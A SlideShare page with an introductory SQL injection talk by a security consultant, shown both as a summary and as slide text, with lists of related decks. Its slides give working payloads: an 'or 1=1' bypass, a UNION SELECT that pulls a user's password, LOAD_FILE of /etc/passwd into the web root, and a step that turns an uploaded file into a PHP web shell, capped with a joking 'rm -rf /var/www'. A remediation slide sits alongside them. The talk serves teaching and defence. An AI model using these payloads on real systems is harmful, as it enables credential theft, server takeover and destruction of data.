Uploaded byhon1nbo
PPTX, PDF182 views

Intro to SQL Injection

The document discusses SQL injection (SQLi) vulnerabilities in web applications, describing various attack vectors and types including visible and blind SQLi. It details examples of how malicious SQL commands can manipulate queries to compromise information and highlights the importance of never trusting user inputs and using parameterized queries for remediation. Additionally, it outlines advanced techniques for exploiting SQL privileges and suggests protective measures against SQLi attacks.

Download to read offline
@hon1nbo Security Consultant
SQL Injection  SQLi Attack Vectors  Web Applications  Mobile Applications  Thick Clients  Two primary types  Visible SQLi  Blind SQLi  Impact  Compromise of info.  Tampering with database  Destruction of info.  Compromise of other server components
Cause  Unsafe Concatenation (usually)  $query = "SELECT userid, username FROM users WHERE username = '$input'";  What happens if…  $input = bob  Returns userid ,username of bob.  $input = ‘bob  SQL Error. Why?
What happened?  Sequence:  $query = “SELECT userid,username FROM users WHERE username = ‘$input’”;  $input = ‘ bob’  $query => “SELECT userid,username FROM users WHERE username = ‘’ bob’’ ”;  i_see_what_you_did_there.jpg
What now?  If we can manipulate the quotes, or similar characters, we can alter the SQL query  $query = “SELECT userid,username FROM users WHERE username = ‘$input’”;  $input = ‘ <malicious SQL Command>  $query => “SELECT userid,username FROM users WHERE username = ‘’ <malicious SQL command>’”;
Manipulating Control  Insertion of conditionals and modifiers  OR, UNION, % (SQL wildcard) are the most common  How can these help us? Demo Time!
Cool Stuff… for a Kiddie  When ‘or ‘1’=1 works there are limitations…  Always returns every valid answer.  Not useful if the system only reads one value, i.e. the first.  Not useful if you need to extract information from alternate columns  Consider the following:  $query = “SELECT userid,username FROM users WHERE username = ‘$input’”  Goal is to obtain the password of the user ‘joe’
SELECT Modifiers  The most glorious of all:  UNION SELECT  Consider the following:  $input = ‘ UNION SELECT 1, password FROM users WHERE username = ‘joe  $query = “SELECT userid,username FROM users WHERE username = ‘’ UNION SELECT 1,password FROM users WHERE username = ‘joe’”;  Demo Time!
Is SQL Broken?  No.  Remediation  NEVER trust user input  ALWAYS escape bad characters  ALWAYS use parameter based queries where possible (Prepared Statements)  See OWASP guide on SQL Injection Prevention for more details
Advanced Techniques  Abusing obscure privileges CREATE Create_priv databases, tables, or indexes DROP Drop_priv databases, tables, or views GRANT OPTION Grant_priv databases, tables, or stored routines LOCK TABLES Lock_tables_priv databases REFERENCES References_priv databases or tables EVENT Event_priv databases ALTER Alter_priv tables DELETE Delete_priv tables INDEX Index_priv tables INSERT Insert_priv tables or columns SELECT Select_priv tables or columns UPDATE Update_priv tables or columns CREATE TEMPORARY TABLES Create_tmp_table_priv tables TRIGGER Trigger_priv tables CREATE VIEW Create_view_priv views SHOW VIEW Show_view_priv views ALTER ROUTINE Alter_routine_priv stored routines CREATE ROUTINE Create_routine_priv stored routines EXECUTE Execute_priv stored routines FILE File_priv file access on server host CREATE USER Create_user_priv server administration PROCESS Process_priv server administration RELOAD Reload_priv server administration REPLICATION CLIENT Repl_client_priv server administration REPLICATION SLAVE Repl_slave_priv server administration SHOW DATABASES Show_db_priv server administration SHUTDOWN Shutdown_priv server administration SUPER Super_priv server administration ALL [PRIVILEGES] server administration USAGE server administration
FILE  File privilege allows disk I/O access  This is BAD for most cases…  How can we abuse this?  ‘; SELECT LOAD_FILE("/etc/passwd") INTO OUTFILE "/var/www/passwd.txt";--  What if we can upload a text file, or post a text comment? What about PHP uploads?  Most servers that will store PHP do so in a non- executable extension or database…  But we can change that
Installing a Shell  Let’s say web server allowed you to attach a text file, called myupload.txt  Let’s say you’re evil, and the contents of myupload.txt is the code of a PHP shell.  Won’t execute due to uploader. Let’s fix that.  '))); SELECT LOAD_FILE("/var/www/<user>/uploads/myupload.tx t") INTO OUTFILE "/var/www/myshell.php";--  Best served with the command “rm –rf /var/www” 
Questions?
Security Consultant @ Cigital, Inc. hon1nbo@hackingand.coffee @hon1nbo

More Related Content

PPT
SQL Injection in PHP
byDave Ross
 
PDF
OWASP TOP 10 for PHP Programmers
byrjsmelo
 
PDF
OWASP Top 10 at International PHP Conference 2014 in Berlin
byTobias Zander
 
PPT
Introduction to SQL Injection
byjpubal
 
PDF
So long, jQuery, and thanks for all the fish!
byMatt Turnure
 
PPTX
Hacking Your Way to Better Security - PHP South Africa 2016
byColin O'Dell
 
ODP
Codegnitorppt
bysreedath c g
 
PDF
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 
SQL Injection in PHP
byDave Ross
 
OWASP TOP 10 for PHP Programmers
byrjsmelo
 
OWASP Top 10 at International PHP Conference 2014 in Berlin
byTobias Zander
 
Introduction to SQL Injection
byjpubal
 
So long, jQuery, and thanks for all the fish!
byMatt Turnure
 
Hacking Your Way to Better Security - PHP South Africa 2016
byColin O'Dell
 
Codegnitorppt
bysreedath c g
 
Hacking Your Way To Better Security - php[tek] 2016
byColin O'Dell
 

What's hot

PDF
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...
byPriyanka Aash
 
PPTX
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 
PDF
Spca2014 hillier 3rd party_javascript_libraries
byNCCOMMS
 
PPTX
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
PDF
Cheap tricks for startups
bySimon Willison
 
PPTX
18.register login
byRazvan Raducanu, PhD
 
PDF
You're Doing it Wrong - WordCamp Atlanta
byChris Scott
 
PPTX
2. 엔티티 매핑(entity mapping) 2 2 엔티티매핑 2-2-4. 식별자 자동 생성(@generated-value) part2
by탑크리에듀(구로디지털단지역3번출구 2분거리)
 
KEY
Introduction to jQuery - Barcamp London 9
byJack Franklin
 
PPT
ໂປຮແກຮມ MySQL
bysaengsavanh saengdanin
 
PDF
Selenium rc presentation_20110104
byMichael Salvucci
 
PPT
Ionic tabs template explained
byRamesh BN
 
PDF
Laravel 로 배우는 서버사이드 #5
by성일 한
 
PDF
FamilySearch Reference Client
byDallan Quass
 
PDF
Angular JS blog tutorial
byClaude Tech
 
PDF
Um roadmap do Framework Ruby on Rails, do Rails 1 ao Rails 4 - DevDay 2013
byJoao Lucas Santana
 
ZIP
Drupal Development (Part 2)
byJeff Eaton
 
PDF
Common UI patterns
bysamselikoff
 
PDF
Djangoアプリのデプロイに関するプラクティス / Deploy django application
byMasashi Shibata
 
KEY
jQuery: Tips, tricks and hints for better development and Performance
byJonas De Smet
 
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...
byPriyanka Aash
 
Hacking Your Way To Better Security - DrupalCon Baltimore 2017
byColin O'Dell
 
Spca2014 hillier 3rd party_javascript_libraries
byNCCOMMS
 
Hacking Your Way to Better Security - ZendCon 2016
byColin O'Dell
 
Cheap tricks for startups
bySimon Willison
 
18.register login
byRazvan Raducanu, PhD
 
You're Doing it Wrong - WordCamp Atlanta
byChris Scott
 
2. 엔티티 매핑(entity mapping) 2 2 엔티티매핑 2-2-4. 식별자 자동 생성(@generated-value) part2
by탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Introduction to jQuery - Barcamp London 9
byJack Franklin
 
ໂປຮແກຮມ MySQL
bysaengsavanh saengdanin
 
Selenium rc presentation_20110104
byMichael Salvucci
 
Ionic tabs template explained
byRamesh BN
 
Laravel 로 배우는 서버사이드 #5
by성일 한
 
FamilySearch Reference Client
byDallan Quass
 
Angular JS blog tutorial
byClaude Tech
 
Um roadmap do Framework Ruby on Rails, do Rails 1 ao Rails 4 - DevDay 2013
byJoao Lucas Santana
 
Drupal Development (Part 2)
byJeff Eaton
 
Common UI patterns
bysamselikoff
 
Djangoアプリのデプロイに関するプラクティス / Deploy django application
byMasashi Shibata
 
jQuery: Tips, tricks and hints for better development and Performance
byJonas De Smet
 

Similar to Intro to SQL Injection

PPT
Advanced sql injection 2
byKarunakar Singh Thakur
 
PPTX
SQL INJECTION
byZiaullah Khan
 
PPT
SQLSecurity.ppt
byLokeshK66
 
PPT
SQLSecurity.ppt
byCNSHacking
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PPT
Sql security
bySafwan Hashmi
 
PPT
Advanced_SQL_ISASasASasaASnjection (1).ppt
byssuserde23af
 
PPTX
SQL INJECTION
byAnoop T
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PDF
Sql injection
byBee_Ware
 
PPTX
Google Dorks and SQL Injection
byMudassir Hassan Khan
 
PPT
Advanced_SQL_Injection .ppt
byiamayesha2526
 
PPT
Advanced_SQL_Injection .ppt
byiamayesha2526
 
PPT
Advancesweqwewqewqewqewqewed_SQL_Injection.ppt
bycyberwarior1978
 
PPT
Sql injection
byNitish Kumar
 
PPSX
Web application security
bywww.netgains.org
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PDF
Sql injection
bySafwan Hashmi
 
PPT
Sql Injection Adv Owasp
byAung Khant
 
PPT
Advanced SQL Injection
byamiable_indian
 
Advanced sql injection 2
byKarunakar Singh Thakur
 
SQL INJECTION
byZiaullah Khan
 
SQLSecurity.ppt
byLokeshK66
 
SQLSecurity.ppt
byCNSHacking
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
Sql security
bySafwan Hashmi
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
byssuserde23af
 
SQL INJECTION
byAnoop T
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
Sql injection
byBee_Ware
 
Google Dorks and SQL Injection
byMudassir Hassan Khan
 
Advanced_SQL_Injection .ppt
byiamayesha2526
 
Advanced_SQL_Injection .ppt
byiamayesha2526
 
Advancesweqwewqewqewqewqewed_SQL_Injection.ppt
bycyberwarior1978
 
Sql injection
byNitish Kumar
 
Web application security
bywww.netgains.org
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
Sql injection
bySafwan Hashmi
 
Sql Injection Adv Owasp
byAung Khant
 
Advanced SQL Injection
byamiable_indian
 

Recently uploaded

PPTX
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pptx
byinfoswipesolutionsin
 
PDF
Cloud-based Hotel PMS_ Why hotels Must Upgrade Now.pdf
byHotelogix
 
PPTX
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
PDF
Custom eCommerce App Development for Modern Retail Stores.pdf
byInexture Solutions
 
PPTX
Streamline Compliance and Safety with Advanced Contractor Management Software
bySHEQ Network Limited
 
PDF
Important Features A Leave Management System Should Have
byCitytech Software DMCC
 
DOCX
What Tools Can Replace Tableau for Interactive Dashboards.docx
byVarsha Nayak
 
PDF
Evolution of Microsoft Project Portfolio Management - What Modern PMOs Are Do...
byOnePlan Solutions
 
PDF
Enterprise Data Sync via Navision Integration Service Provider
byNavision India
 
PDF
Agentic AI meets Serverless on AWS - AWS User Group Cologne 2025
byVadym Kazulkin
 
PDF
Zoople Technologies: Premier Data Science Institute in Kozhikode
byaromalcsunil761
 
PDF
Build Vs. Buy: Cloud Cost Management and FinOps
byAmnic
 
PPTX
College Management System.pptx
bygehlotyash2005
 
PDF
Guidewire Connections 2025 PT 6 Unleash the Power of Agentic AI with Guidewire
byBrian Petrini
 
PDF
Simplify Finances with Qandle’s Expense Software.pdf
byQandle
 
PPTX
Hall-Pass-Management-Software-Transforming-School-Safety-and-Efficiency.pptx
byinfoswipesolutionsin
 
PDF
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pdf
byinfoswipesolutionsin
 
PPTX
Classify and visualize Jira work to stay focused and foster innovation - Work...
byWork Type Focus
 
PDF
AI-Powered Alert Analysis with ClickHouse Cloud Databases.pdf
byAlkin Tezuysal
 
PDF
Patterns of Patterns and why we need them
bydescri1
 
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pptx
byinfoswipesolutionsin
 
Cloud-based Hotel PMS_ Why hotels Must Upgrade Now.pdf
byHotelogix
 
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
Custom eCommerce App Development for Modern Retail Stores.pdf
byInexture Solutions
 
Streamline Compliance and Safety with Advanced Contractor Management Software
bySHEQ Network Limited
 
Important Features A Leave Management System Should Have
byCitytech Software DMCC
 
What Tools Can Replace Tableau for Interactive Dashboards.docx
byVarsha Nayak
 
Evolution of Microsoft Project Portfolio Management - What Modern PMOs Are Do...
byOnePlan Solutions
 
Enterprise Data Sync via Navision Integration Service Provider
byNavision India
 
Agentic AI meets Serverless on AWS - AWS User Group Cologne 2025
byVadym Kazulkin
 
Zoople Technologies: Premier Data Science Institute in Kozhikode
byaromalcsunil761
 
Build Vs. Buy: Cloud Cost Management and FinOps
byAmnic
 
College Management System.pptx
bygehlotyash2005
 
Guidewire Connections 2025 PT 6 Unleash the Power of Agentic AI with Guidewire
byBrian Petrini
 
Simplify Finances with Qandle’s Expense Software.pdf
byQandle
 
Hall-Pass-Management-Software-Transforming-School-Safety-and-Efficiency.pptx
byinfoswipesolutionsin
 
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pdf
byinfoswipesolutionsin
 
Classify and visualize Jira work to stay focused and foster innovation - Work...
byWork Type Focus
 
AI-Powered Alert Analysis with ClickHouse Cloud Databases.pdf
byAlkin Tezuysal
 
Patterns of Patterns and why we need them
bydescri1
 

Intro to SQL Injection

  • 1.
  • 2.
    SQL Injection  SQLiAttack Vectors  Web Applications  Mobile Applications  Thick Clients  Two primary types  Visible SQLi  Blind SQLi  Impact  Compromise of info.  Tampering with database  Destruction of info.  Compromise of other server components
  • 3.
    Cause  Unsafe Concatenation(usually)  $query = "SELECT userid, username FROM users WHERE username = '$input'";  What happens if…  $input = bob  Returns userid ,username of bob.  $input = ‘bob  SQL Error. Why?
  • 4.
    What happened?  Sequence: $query = “SELECT userid,username FROM users WHERE username = ‘$input’”;  $input = ‘ bob’  $query => “SELECT userid,username FROM users WHERE username = ‘’ bob’’ ”;  i_see_what_you_did_there.jpg
  • 5.
    What now?  Ifwe can manipulate the quotes, or similar characters, we can alter the SQL query  $query = “SELECT userid,username FROM users WHERE username = ‘$input’”;  $input = ‘ <malicious SQL Command>  $query => “SELECT userid,username FROM users WHERE username = ‘’ <malicious SQL command>’”;
  • 6.
    Manipulating Control  Insertionof conditionals and modifiers  OR, UNION, % (SQL wildcard) are the most common  How can these help us? Demo Time!
  • 7.
    Cool Stuff… fora Kiddie  When ‘or ‘1’=1 works there are limitations…  Always returns every valid answer.  Not useful if the system only reads one value, i.e. the first.  Not useful if you need to extract information from alternate columns  Consider the following:  $query = “SELECT userid,username FROM users WHERE username = ‘$input’”  Goal is to obtain the password of the user ‘joe’
  • 8.
    SELECT Modifiers  Themost glorious of all:  UNION SELECT  Consider the following:  $input = ‘ UNION SELECT 1, password FROM users WHERE username = ‘joe  $query = “SELECT userid,username FROM users WHERE username = ‘’ UNION SELECT 1,password FROM users WHERE username = ‘joe’”;  Demo Time!
  • 9.
    Is SQL Broken? No.  Remediation  NEVER trust user input  ALWAYS escape bad characters  ALWAYS use parameter based queries where possible (Prepared Statements)  See OWASP guide on SQL Injection Prevention for more details
  • 10.
    Advanced Techniques  Abusingobscure privileges CREATE Create_priv databases, tables, or indexes DROP Drop_priv databases, tables, or views GRANT OPTION Grant_priv databases, tables, or stored routines LOCK TABLES Lock_tables_priv databases REFERENCES References_priv databases or tables EVENT Event_priv databases ALTER Alter_priv tables DELETE Delete_priv tables INDEX Index_priv tables INSERT Insert_priv tables or columns SELECT Select_priv tables or columns UPDATE Update_priv tables or columns CREATE TEMPORARY TABLES Create_tmp_table_priv tables TRIGGER Trigger_priv tables CREATE VIEW Create_view_priv views SHOW VIEW Show_view_priv views ALTER ROUTINE Alter_routine_priv stored routines CREATE ROUTINE Create_routine_priv stored routines EXECUTE Execute_priv stored routines FILE File_priv file access on server host CREATE USER Create_user_priv server administration PROCESS Process_priv server administration RELOAD Reload_priv server administration REPLICATION CLIENT Repl_client_priv server administration REPLICATION SLAVE Repl_slave_priv server administration SHOW DATABASES Show_db_priv server administration SHUTDOWN Shutdown_priv server administration SUPER Super_priv server administration ALL [PRIVILEGES] server administration USAGE server administration
  • 11.
    FILE  File privilegeallows disk I/O access  This is BAD for most cases…  How can we abuse this?  ‘; SELECT LOAD_FILE("/etc/passwd") INTO OUTFILE "/var/www/passwd.txt";--  What if we can upload a text file, or post a text comment? What about PHP uploads?  Most servers that will store PHP do so in a non- executable extension or database…  But we can change that
  • 12.
    Installing a Shell Let’s say web server allowed you to attach a text file, called myupload.txt  Let’s say you’re evil, and the contents of myupload.txt is the code of a PHP shell.  Won’t execute due to uploader. Let’s fix that.  '))); SELECT LOAD_FILE("/var/www/<user>/uploads/myupload.tx t") INTO OUTFILE "/var/www/myshell.php";--  Best served with the command “rm –rf /var/www” 
  • 13.
  • 14.
    Security Consultant @Cigital, Inc. hon1nbo@hackingand.coffee @hon1nbo